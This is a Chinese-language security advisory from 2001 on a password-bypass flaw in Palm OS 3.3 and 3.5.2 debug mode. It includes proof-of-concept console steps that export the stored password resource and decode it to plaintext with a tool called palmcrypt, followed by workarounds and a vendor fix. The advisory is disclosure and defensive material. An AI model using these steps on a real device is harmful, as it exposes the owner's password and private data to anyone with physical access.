Palm OS 调试模式下口令绕过漏洞
发布日期:2001-03-09
更新日期:2001-03-09
受影响系统:
Palm Palm OS 3.5.2
Palm Palm OS 3.3
描述:
BUGTRAQ ID: 2429
Palm OS 提供口令保护功能,使得设备所有者可以限制
对敏感数据的访问。
在 Palm OS 的调试模式下,从 Graffiti stylus 界面
访问时任何可以物理访问 PDA 的用户可以绕过口令保护。
因为调试模式下容许摆弄记录、应用、系统口令信息,特
别是可以检索系统口令(密文形式),输入输出数据库和
应用。
<* 来源:Kingpin (
kingpin@atstake.com)
URL:
http://www.atstake.com/research/advisories/2001/a030101-1.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Kingpin (
kingpin@atstake.com) 提供了下列测试代码:
在调试模式下:
<--- begin console mode screenshot --->
Ready...
>export 0 "Unsaved Preferences"
Unsaved Preferences
Getting info on resource 3 of 3
Exporting resource 3 of 3
Success!!
<--- end console mode screenshot --->
将保存的数据,使用解密程序解密:
<--- begin palmcrypt screenshot --->
E:\>palmcrypt -d
568CD23E994B0F8809021345070413440C08135A3215135DD217EAD3B5DF5563
PalmOS Password Codec
kingpin@atstake.com
@stake Research Labs
http://www.atstake.com/research/
August 2000
0x74 0x65 0x73 0x74 [test ]
<--- end palmcrypt screenshot --->
建议:
临时解决办法:
NSFOCUS建议您不要在Palm上存储敏感信息,并防止非法访问串口。
厂商补丁:
Palm OS 4.0 将会解决这个问题。
浏览次数:3656
严重程度:0(网友投票)